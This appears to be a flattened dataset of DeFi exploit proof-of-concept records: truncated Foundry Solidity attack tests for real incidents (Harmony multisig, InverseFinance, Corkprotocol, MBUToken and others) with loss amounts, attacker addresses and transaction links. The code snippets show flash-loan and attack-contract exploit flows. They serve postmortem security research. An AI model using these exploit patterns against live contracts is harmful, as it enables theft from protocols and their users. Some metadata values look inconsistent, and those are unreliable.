function testExploit() public { // Set msg.sender = 0xf70f691d30ce23786cfb3a1522cfd76d159aca8d (Main Attack Contract) // Set tx.origin = 0xb7CBB4d43F1e08327A90B32A8417688C9D0B800a (Attacker) cheat.startPrank(address(this), attacker); emit log_string("[Exploit] Making pledged record...")...
true
$3.1K
6
medium
XCarnival Exploit (2022-06)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); IERC20 usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7); MultiSig Mul...
exploit_poc
Harmony_multisig
2022-06
Harmony_multisig_exp.sol
null
02ca5f2ea69ba2bb
2026-01-07T10:59:16.513292
postmortems
ethereum
15,012,645
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_uint("USDT balance of attacker before Exploit", usdt.balanceOf(address(this))); // Mulsig Case of compromised private key. emit log_named_uint("How many approval required:", MultiSigWallet.required()); cheat.prank(0xf845A7ee8477AD1FB4446651E...
true
Unknown
3.28
low
Harmony_multisig Exploit (2022-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface ProxyFactory { function createProxy(address masterCopy, bytes calldata data) external returns (address payable proxy); } contract ContractTest is Test { ProxyFactory proxy = Prox...
exploit_poc
Optimism
2022-06
Optimism_exp.sol
null
30f7c69bfe25b139
2026-01-07T10:59:16.513334
postmortems
unknown
10,607,735
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { while (childcontract != 0x4f3a120E72C76c22ae802D129F599BFDbc31cb81) { childcontract = proxy.createProxy(0xE7145dd6287AE53326347f3A6694fCf2954bcD8A, "0x"); emit log_named_address("Created Wintermute contract", childcontract); } }
true
Unknown
2.46
low
Optimism Exploit (2022-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IERC20 WBTC = IERC20(0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599); IERC20...
exploit_poc
InverseFinance
2022-06
InverseFinance_exp.sol
flash_loan
92de15942a86b085
2026-01-07T10:59:16.513375
postmortems
unknown
14,972,418
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { aaveLendingPool.flashLoan(address(this), assets, amounts, modes, address(this), "0x", 0); emit log_named_uint("After flashloan repaid, profit in WBTC of attacker:", WBTC.balanceOf(address(this))); }
true
Unknown
6
medium
InverseFinance Exploit (2022-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x6CD71A07E72C514f5d511651F6...
exploit_poc
Gym_2
2022-06
Gym_2_exp.sol
null
7f858922b169cb50
2026-01-07T10:59:16.513429
postmortems
unknown
18,501,049
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { gympool.depositFromOtherContract(8_000_000_000_000_000_000_000_666, 0, true, address(this)); cheat.warp(1_654_683_789); gympool.withdraw(0); emit log_named_uint("Exploit completed, GYMNET balance of attacker:", gymnet.balanceOf(address(this))); }
true
Unknown
2.47
low
Gym_2 Exploit (2022-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface ETHpledge { function pledgein(address fatheraddr, uint256 amountt) external returns (bool); } // Expected error. [FAIL. Reason: Pancake: INSUFFICIENT_INPUT_AMOUNT] // Because we don't...
exploit_poc
Discover
2022-06
Discover_exp.sol
null
53e20da6dfcee438
2026-01-07T10:59:16.513467
postmortems
unknown
18,446,845
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { bytes memory data = abi.encode(address(this), 19_810_777_285_664_651_588_959); emit log_named_uint("Before flashswap, BUSD balance of attacker:", busd.balanceOf(address(this))); PancakePair2.swap(19_810_777_285_664_651_588_959, 0, address(this), data); }
true
Unknown
2.98
low
Discover Exploit (2022-06)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED import "../interface.sol"; import "forge-std/Test.sol"; pragma solidity ^0.8.13; contract ContractTest is Test { address USDT = 0x55d398326f99059fF775485246999027B3197955; address YDT= 0x3612e4Cb34617bCac849Add27366D8D85C102eFd; address taxmodule =0x013E29791A230...
exploit_poc
YDTtoken
2025-05
YDTtoken_exp.sol
null
13c9d6194b0bba8d
2026-01-07T10:59:16.513506
postmortems
unknown
50,273,545
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
0.77
low
YDTtoken Exploit (2025-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.25; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~9 K usdt // Original Attacker : https://basescan.org/address/0x5cc162c556092fe1d993b95d1b9e9ce58a11dbc9 // Attack Contract : https://basescan.org/address/0x0c6a8c285d69...
exploit_poc
Unwarp
2025-05
Unwarp_exp.sol
flash_loan
0786e3c9e299684b
2026-01-07T10:59:16.513543
postmortems
base
30,210,273
~9 K usdt
9,000
https://basescan.org/address/0x5cc162c556092fe1d993b95d1b9e9ce58a11dbc9
https://basescan.org/address/0x0c6a8c285d696d4d9b8dd4079a72a6460a4da05f
https://basescan.org/address/0x8befc1d90d03011a7d0b35b3a00ec50f8e014802
https://app.blocksec.com/explorer/tx/base/0xac6f716c57bbb1a4c1e92f0a9531019ea2ecfcaea67794bbd27115d400ae9b41
null
null
true
false
true
low
~9 K usdt
flash-loan
function testExploit() public { IERC20(WETH).approve(address(vault), type(uint256).max); address[] memory assets = new address[](1); assets[0] = address(WETH); uint256[] memory amounts = new uint256[](1); amounts[0] = 100852657473363426325; bytes memory encodedata = abi.e...
true
~9 K usdt
https://basescan.org/address/0x5cc162c556092fe1d993b95d1b9e9ce58a11dbc9
https://basescan.org/address/0x0c6a8c285d696d4d9b8dd4079a72a6460a4da05f
https://basescan.org/address/0x8befc1d90d03011a7d0b35b3a00ec50f8e014802
https://app.blocksec.com/explorer/tx/base/0xac6f716c57bbb1a4c1e92f0a9531019ea2ecfcaea67794bbd27115d400ae9b41
$9.0K
8
medium
Unwarp Exploit (2025-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 105470 USDC // Attacker : https://basescan.org/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 // Attack Tx : https://basescan.org/tx/0x16a99aef4fab36c84ba4616668a03a5b...
exploit_poc
Nalakuvara_LotteryTicket50
2025-05
Nalakuvara_LotteryTicket50_exp.sol
null
d6865de81f1f198f
2026-01-07T10:59:16.513589
postmortems
base
30,001,613
105470 USDC
105,470
https://basescan.org/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
null
null
https://basescan.org/tx/0x16a99aef4fab36c84ba4616668a03a5b37caa12e2fc48923dba4e711d2094699
null
null
true
true
false
high
105470 USDC
unknown
function testExploit() public { emit log_named_decimal_uint("USDC before attack", IUSDC(usdc).balanceOf(attacker), 6); vm.prank(attacker); AttackerC ac = new AttackerC{value: 0.2 ether}(); ac.attack(); vm.stopPrank(); emit log_named_decimal_uint("USDC after attack", IUS...
true
105470 USDC
https://basescan.org/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
https://basescan.org/tx/0x16a99aef4fab36c84ba4616668a03a5b37caa12e2fc48923dba4e711d2094699
$105.5K
6.9
medium
Nalakuvara_LotteryTicket50 Exploit (2025-05)
true
false
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 69.6K USD // Attacker : // Attack Contract : // Vulnerable Contract : // Backdoor Tx : https://bscscan.com/tx/0x8c637fc98ad84b922e6301c0b697167963eee53bbdc19665f5d122ae55234ca6 // Rugpull Tx : https://bscsca...
exploit_poc
IRYSAI
2025-05
IRYSAI_exp.sol
null
fbaf5421efdd1210
2026-01-07T10:59:16.513643
postmortems
bsc
49,994,891
69.6K USD
69,600
null
null
null
null
https://x.com/TenArmorAlert/status/1925012844052975776
https://x.com/TenArmorAlert/status/1925012844052975776
true
true
false
medium
69.6K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of addr3", address(addr3).balance, 18); vm.startPrank(addr1, addr1); addr3C attC = new addr3C(); IIRYSAI(IRYSAI).setTaxWallet(address(attC)); vm.startPrank(addr3, addr3); attC.burn(); ...
true
69.6K USD
https://x.com/TenArmorAlert/status/1925012844052975776
https://x.com/TenArmorAlert/status/1925012844052975776
$69.6K
5.78
medium
IRYSAI Exploit (2025-05)
true
false
false
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 34.5 WETH ($88.1K) // Attacker : https://basescan.org/address/0x2a49c6fd18bd111d51c4fffa6559be1d950b8eff // Attack Contract : https://basescan.org/address/0x7ee23c81995fe79...
exploit_poc
RICE
2025-05
RICE_exp.sol
null
ae2a8c003c7ed777
2026-01-07T10:59:16.513702
postmortems
base
null
~ 34.5 WETH ($88.1K)
34.5
https://basescan.org/address/0x2a49c6fd18bd111d51c4fffa6559be1d950b8eff
https://basescan.org/address/0x7ee23c81995fe7992721ac14b3af522718b63f8f
https://basescan.org/address/0xcfe0de4a50c80b434092f87e106dfa40b71a5563
https://basescan.org/tx/0x8421c96c1cafa451e025c00706599ef82780bdc0db7d17b6263511a420e0cf20
null
https://x.com/TenArmorAlert/status/1926461662644633770
true
true
false
low
~ 34.5 WETH ($88.1K)
unknown
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); attackContract.start(); } receive() external payable { // Handle the received funds } } contract AttackContract { address attacker; constructor() { attacker = msg.sende...
true
~ 34.5 WETH ($88.1K)
https://basescan.org/address/0x2a49c6fd18bd111d51c4fffa6559be1d950b8eff
https://basescan.org/address/0x7ee23c81995fe7992721ac14b3af522718b63f8f
https://basescan.org/address/0xcfe0de4a50c80b434092f87e106dfa40b71a5563
https://basescan.org/tx/0x8421c96c1cafa451e025c00706599ef82780bdc0db7d17b6263511a420e0cf20
https://x.com/TenArmorAlert/status/1926461662644633770
$34
8.62
high
RICE Exploit (2025-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~2.16 M BUSD // Original Attacker : https://bscscan.com/address/0xb32a53af96f7735d47f4b76c525bd5eb02b42600 // Attack Contract : https://bscscan.com/address/0x631adff068d48...
exploit_poc
MBUToken
2025-05
MBUToken_exp.sol
null
a4bd2beae47943ad
2026-01-07T10:59:16.513760
postmortems
bsc
49,470,430
~2.16 M BUSD
2,160,000
https://bscscan.com/address/0xb32a53af96f7735d47f4b76c525bd5eb02b42600
https://bscscan.com/address/0x631adff068d484ce531fb519cda4042805521641
null
https://bscscan.com/tx/0x2a65254b41b42f39331a0bcc9f893518d6b106e80d9a476b8ca3816325f4a150
null
null
true
false
false
critical
~2.16 M BUSD
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attC = new AttackerC(); attC.attack{value: 1 ether}(); emit log_named_decimal_uint("Profit in BUSD", IERC20(BUSD).balanceOf(attacker), 18); } } contract AttackerC {
true
~2.16 M BUSD
https://bscscan.com/address/0xb32a53af96f7735d47f4b76c525bd5eb02b42600
https://bscscan.com/address/0x631adff068d484ce531fb519cda4042805521641
https://bscscan.com/tx/0x2a65254b41b42f39331a0bcc9f893518d6b106e80d9a476b8ca3816325f4a150
$2.16M
6.28
medium
MBUToken Exploit (2025-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 7k USD // Attacker : https://bscscan.com/address/0x9943f26831f9b468a7fe5ac531c352baab8af655 // Attack Contract : 0xd995edcab2efe3283514ff111cedc9aaff0349c8 // Vulnerable Cont...
exploit_poc
KRCToken_pair
2025-05
KRCToken_pair_exp.sol
flash_loan
2ec3a19294dfeae1
2026-01-07T10:59:16.513803
postmortems
bsc
null
7k USD
7,000
https://bscscan.com/address/0x9943f26831f9b468a7fe5ac531c352baab8af655
null
https://bscscan.com/address/0xdbead75d3610209a093af1d46d5296bbeffd53f5
https://bscscan.com/tx/0x78f242dee5b8e15a43d23d76bce827f39eb3ac54b44edcd327c5d63de3848daf
https://x.com/OpenZeppelin/status/1953111764536561867
https://x.com/CertikAIAgent/status/1924280794916536765
true
true
true
low
7k USD
flash-loan
function testExploit() public balanceLog { // Step 1: Initial Flashloan from Dodo Private Pool dodo_private_pool.flashLoan(0, dodo_borrow_amount, address(this), new bytes(1)); } // Step 2: Dodo Flashloan Callback
true
7k USD
https://bscscan.com/address/0x9943f26831f9b468a7fe5ac531c352baab8af655
https://bscscan.com/address/0xdbead75d3610209a093af1d46d5296bbeffd53f5
https://bscscan.com/tx/0x78f242dee5b8e15a43d23d76bce827f39eb3ac54b44edcd327c5d63de3848daf
https://x.com/OpenZeppelin/status/1953111764536561867
https://x.com/CertikAIAgent/status/1924280794916536765
$7.0K
9.88
high
KRCToken_pair Exploit (2025-05)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 43k USD // Attacker : https://etherscan.io/address/0x2ae2f691642bb18cd8deb13a378a0f95a9fee933 // Attack Contract : https://etherscan.io/address/0xf195b8800b729aee5e57851dd4330fcbb69f07ea // Vulnerable ...
exploit_poc
UsualMoney
2025-05
UsualMoney_exp.sol
flash_loan
7b6fde5fec8ad924
2026-01-07T10:59:16.513862
postmortems
ethereum
null
43k USD
43,000
https://etherscan.io/address/0x2ae2f691642bb18cd8deb13a378a0f95a9fee933
https://etherscan.io/address/0xf195b8800b729aee5e57851dd4330fcbb69f07ea
https://etherscan.io/address/0x35d8949372d46b7a3d5a56006ae77b215fc69bc0
https://etherscan.io/tx/0x585d8be6a0b07ca2f94cfa1d7542f1a62b0d3af5fab7823cbcf69fb243f271f8
https://www.quadrigainitiative.com/hackfraudscam/usualmoneyusdssyncvaultpricingarbitrageexploit.php
https://x.com/BlockSecTeam/status/1927601457815040283
true
true
true
medium
43k USD
flash-loan
function testExploit() public balanceLog { // Approve UNI_V3_POS to spend sUSDS for minting liquidity position sUSDS.approve(address(UNI_V3_POS), 10); // Create and initialize Uniswap V3 pool for USD0/sUSDS if it doesn't exist UNI_V3_POS.createAndInitializePoolIfNecessary(address(USD0), ...
true
43k USD
https://etherscan.io/address/0x2ae2f691642bb18cd8deb13a378a0f95a9fee933
https://etherscan.io/address/0xf195b8800b729aee5e57851dd4330fcbb69f07ea
https://etherscan.io/address/0x35d8949372d46b7a3d5a56006ae77b215fc69bc0
https://etherscan.io/tx/0x585d8be6a0b07ca2f94cfa1d7542f1a62b0d3af5fab7823cbcf69fb243f271f8
https://www.quadrigainitiative.com/hackfraudscam/usualmoneyusdssyncvaultpricingarbitrageexploit.php
https://x.com/BlockSecTeam/status/1927601457815040283
$43.0K
10
high
UsualMoney Exploit (2025-05)
true
true
true
true
pragma solidity 0.8.26; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 12M USD // Attacker : 0xea6f30e360192bae715599e15e2f765b49e4da98 // Attack Contract : https://etherscan.io/address/0x9af3dce0813fd7428c47f57a39da2f6dd7c9bb09 // Vulnerable Contract : // Attack Txs: https://app....
exploit_poc
Corkprotocol
2025-05
Corkprotocol_exp.sol
null
400264e5402e353e
2026-01-07T10:59:16.513957
postmortems
ethereum
22,581,020
12M USD
12,000,000
null
https://etherscan.io/address/0x9af3dce0813fd7428c47f57a39da2f6dd7c9bb09
null
null
https://x.com/SlowMist_Team/status/1928100756156194955
https://x.com/SlowMist_Team/status/1928100756156194955
true
true
false
critical
12M USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(WstETH).balanceOf(attacker), 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); // Approve in https://app.blocksec.com/explorer/tx/eth/0xb54308956e58fc124503e01eaae...
true
12M USD
https://etherscan.io/address/0x9af3dce0813fd7428c47f57a39da2f6dd7c9bb09
https://x.com/SlowMist_Team/status/1928100756156194955
https://x.com/SlowMist_Team/status/1928100756156194955
$12.00M
7
medium
Corkprotocol Exploit (2025-05)
true
false
false
true
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { WETH9 WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2); USDC usd...
exploit_poc
Mono
2021-11
Mono_exp.sol
null
d6c68040e8b24aaf
2026-01-07T10:59:16.514039
postmortems
unknown
13,715,025
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { mono.approve(Monoswap_address, type(uint256).max); WETH.deposit{value: address(this).balance, gas: 40_000}(); // WETH.balanceOf(address(this)); // VISR_Balance = visr.balanceOf(msg.sender); emit log_named_uint("WETH Balance", WETH.balanceOf(addre...
true
Unknown
4.04
low
Mono Exploit (2021-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 365K // Attacker : https://bscscan.com/address/0x2f618493b9ff77d61426e4dbf3b844666a6b315e // Attack Contract : https://bscscan.com/address/0xcd8206410b55e278a9538071a69ef9e18...
exploit_poc
Ploutoz
2021-11
Ploutoz_exp.sol
flash_loan
cceb6324ca1dc31e
2026-01-07T10:59:16.514090
postmortems
bsc
null
365K
365,000
https://bscscan.com/address/0x2f618493b9ff77d61426e4dbf3b844666a6b315e
https://bscscan.com/address/0xcd8206410b55e278a9538071a69ef9e185856d24
https://bscscan.com/address/0x844fa82f1e54824655470970f7004dd90546bb28
https://bscscan.com/tx/0x7fe46c2746855dd57e18f4d33522849ff192e4e26c74835799ba8dab89099457
https://x.com/peckshield/status/1463113809111896065
null
true
true
true
high
365K
flash-loan
function testExploit() public balanceLog { uint256 _amount0Out = 0; uint256 _amount1Out = 1_000_400.0 ether; IUniswapV2Pair(PancakeSwap).swap(_amount0Out, _amount1Out, address(this), "X"); swapLoanedTokenToStables(); }
true
365K
https://bscscan.com/address/0x2f618493b9ff77d61426e4dbf3b844666a6b315e
https://bscscan.com/address/0xcd8206410b55e278a9538071a69ef9e185856d24
https://bscscan.com/address/0x844fa82f1e54824655470970f7004dd90546bb28
https://bscscan.com/tx/0x7fe46c2746855dd57e18f4d33522849ff192e4e26c74835799ba8dab89099457
https://x.com/peckshield/status/1463113809111896065
$365.0K
9.77
high
Ploutoz Exploit (2021-11)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$67K // Attacker : https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339 // Attack Contract : https://bscscan.com/address/0xb5eebf73448e22ce6a556f84836...
exploit_poc
BurnsDefi
2024-02
BurnsDefi_exp.sol
flash_loan
7d1658da3991804e
2026-01-07T10:59:16.514147
postmortems
bsc
35,858,189
~$67K
67,000
https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339
https://bscscan.com/address/0xb5eebf73448e22ce6a556f848360057f6aadd4e7
null
https://app.blocksec.com/explorer/tx/bsc/0x1d0af3a963682748493f21bf9e955ce3a950bee5817401bf2486db7a0af104b4
null
null
true
true
true
medium
~$67K
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); deal(address(this), 0); emit log_named_decimal_uint( "Exploiter BUSDT balance before attack", BUSDT.balanceOf(exploiter), BUSDT.decimals() ); emit log_named_decimal_uint( "Exploiter Bu...
true
~$67K
https://bscscan.com/address/0xc9fbcf3eb24385491f73bbf691b13a6f8be7c339
https://bscscan.com/address/0xb5eebf73448e22ce6a556f848360057f6aadd4e7
https://app.blocksec.com/explorer/tx/bsc/0x1d0af3a963682748493f21bf9e955ce3a950bee5817401bf2486db7a0af104b4
$67.0K
9
high
BurnsDefi Exploit (2024-02)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~170K USD$ // Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd // Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d...
exploit_poc
DeezNutz404
2024-02
DeezNutz404_exp.sol
flash_loan
413dc656801d5056
2026-01-07T10:59:16.514231
postmortems
ethereum
19,277,802
~170K USD$
170,000
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://etherscan.io/address/0xb57e874082417b66877429481473cf9fcd8e0b8a#code
https://etherscan.io/tx/0xbeefd8faba2aa82704afe821fd41b670319203dd9090f7af8affdf6bcfec2d61
null
null
true
true
true
high
~170K USD$
flash-loan
function testExploit() public { address[] memory tokens = new address[](1); tokens[0] = address(WETH); uint256[] memory amounts = new uint256[](1); amounts[0] = 2000 ether; emit log_string("------------------- flashloan from balancer ---------"); vault.flashLoan(address(...
true
~170K USD$
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://etherscan.io/address/0xb57e874082417b66877429481473cf9fcd8e0b8a#code
https://etherscan.io/tx/0xbeefd8faba2aa82704afe821fd41b670319203dd9090f7af8affdf6bcfec2d61
$170.0K
8.6
high
DeezNutz404 Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~18ETH // Attacker : https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab // Attack Contract : https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0d...
exploit_poc
GAIN
2024-02
GAIN_exp.sol
null
c7f3853843910d81
2026-01-07T10:59:16.514279
postmortems
ethereum
19,277,620
~18ETH
18
https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab
https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0db24932a4d5f38d0f
null
https://etherscan.io/tx/0x7acc896b8d82874c67127ff3359d7437a15fdb4229ed83da00da1f4d8370764e
null
null
true
true
false
low
~18ETH
unknown
false
~18ETH
https://etherscan.io/address/0x0000000f95c09138dfea7d9bcf3478fc2e13dcab
https://etherscan.io/address/0x9a4b9fd32054bfe2099f2a0db24932a4d5f38d0f
https://etherscan.io/tx/0x7acc896b8d82874c67127ff3359d7437a15fdb4229ed83da00da1f4d8370764e
$18
4.36
low
GAIN Exploit (2024-02)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~7729 $DAI $USDC // Attacker : https://etherscan.io/address/0x38f68f119243adbca187e1ef64344ed475a8c69c // Attack Contract : https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 // Vulnerable Contract : https:/...
exploit_poc
SwarmMarkets
2024-02
SwarmMarkets_exp.sol
null
1ba29e9396078d44
2026-01-07T10:59:16.514325
postmortems
ethereum
19,286,457
~7729 $DAI $USDC
7,729
https://etherscan.io/address/0x38f68f119243adbca187e1ef64344ed475a8c69c
https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
https://etherscan.io/address/0x2b9dc65253c035eb21778cb3898eab5a0ada0cce
https://etherscan.io/tx/0xc0be8c3792a5b1ba7d653dc681ff611a5b79a75fe51c359cf1aac633e9441574
null
null
true
false
false
low
~7729 $DAI $USDC
unknown
function testExploit() public { emit log_named_decimal_uint("Attacker DAI balance before attack:", DAI.balanceOf(address(this)), 18); emit log_named_decimal_uint("Attacker USDC balance before attack:", DAI.balanceOf(address(this)), 18); XTOKEN.mint(address(this), DAI.balanceOf(address(wrapper)))...
true
~7729 $DAI $USDC
https://etherscan.io/address/0x38f68f119243adbca187e1ef64344ed475a8c69c
https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
https://etherscan.io/address/0x2b9dc65253c035eb21778cb3898eab5a0ada0cce
https://etherscan.io/tx/0xc0be8c3792a5b1ba7d653dc681ff611a5b79a75fe51c359cf1aac633e9441574
$7.7K
7.24
medium
SwarmMarkets Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~439537 US$ // Attacker : 0xe000008459b74a91e306a47c808061dfa372000e // Attack Contract : 0x2f99fb66ea797e7fa2d07262402ab38bd5e53b12 // Vulnerable Contract : Compound pr...
exploit_poc
CompoundUni
2024-02
CompoundUni_exp.sol
flash_loan
9851277f45e86273
2026-01-07T10:59:16.514368
postmortems
ethereum
19,290,921
~439537 US$
439,537
null
null
null
https://etherscan.io/tx/0xaee0f8d1235584a3212f233b655f87b89f22f1d4890782447c4ef742b37af58d
null
https://twitter.com/0xLEVI104/status/1762092203894276481
true
true
true
high
~439537 US$
flash-loan
function testExploit() public { console.log("USDC balance:"); emit log_named_decimal_uint(" [INFO] Before attack", USDC.balanceOf(address(this)), 6); address[] memory tokens = new address[](1); uint256[] memory amounts = new uint256[](1); tokens[0] = address(USDC); amo...
true
~439537 US$
https://etherscan.io/tx/0xaee0f8d1235584a3212f233b655f87b89f22f1d4890782447c4ef742b37af58d
https://twitter.com/0xLEVI104/status/1762092203894276481
$439.5K
8.82
high
CompoundUni Exploit (2024-02)
true
false
true
false
import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$1,400,000 USD // Attacker : https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 (whitehat) // Attack Contract : https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 // Vulnerable Contract : ht...
exploit_poc
BlueberryProtocol
2024-02
BlueberryProtocol_exp.sol
flash_loan
a551f43d531569c9
2026-01-07T10:59:16.514423
postmortems
ethereum
19,287,289
~$1,400,000 USD
1
https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671
https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
https://etherscan.io/address/0xffadb0bba4379dfabfb20ca6823f6ec439429ec2
https://etherscan.io/tx/0xf0464b01d962f714eee9d4392b2494524d0e10ce3eb3723873afd1346b8b06e4
null
null
true
true
true
low
~$1,400,000 USD
flash-loan
function testAttack() public { vm.deal(address(this), 0.000000000000009997 ether); WETH.deposit{value: 0.000000000000009997 ether}(); approveAll(); address[] memory tokens = new address[](1); tokens[0] = address(WETH); uint256[] memory amounts = new uint256[](1); ...
true
~$1,400,000 USD
https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671
https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
https://etherscan.io/address/0xffadb0bba4379dfabfb20ca6823f6ec439429ec2
https://etherscan.io/tx/0xf0464b01d962f714eee9d4392b2494524d0e10ce3eb3723873afd1346b8b06e4
$1
9.32
high
BlueberryProtocol Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 200K // Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd // Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f...
exploit_poc
DN404
2024-02
DN404_exp.sol
null
4bda2dd111204c71
2026-01-07T10:59:16.514475
postmortems
ethereum
null
200K
200,000
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://etherscan.io/address/0x2c7112245fc4af701ebf90399264a7e89205dad4
https://etherscan.io/tx/0xbeef09ee9d694d2b24f3f367568cc6ba1dad591ea9f969c36e5b181fd301be82
null
null
true
true
false
high
200K
unknown
function testExploit() public { // Implement exploit code here emit log_named_decimal_uint(" Attacker USDT Balance Before exploit", IERC20(USDT).balanceOf(address(this)), 6); uint256 initPeriods = 1; uint256 initInterval = 1_000_000_000_000_000_000; uint256 amount = IERC20(FLIX)...
true
200K
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://etherscan.io/address/0x2c7112245fc4af701ebf90399264a7e89205dad4
https://etherscan.io/tx/0xbeef09ee9d694d2b24f3f367568cc6ba1dad591ea9f969c36e5b181fd301be82
$200.0K
7.3
medium
DN404 Exploit (2024-02)
true
true
true
false
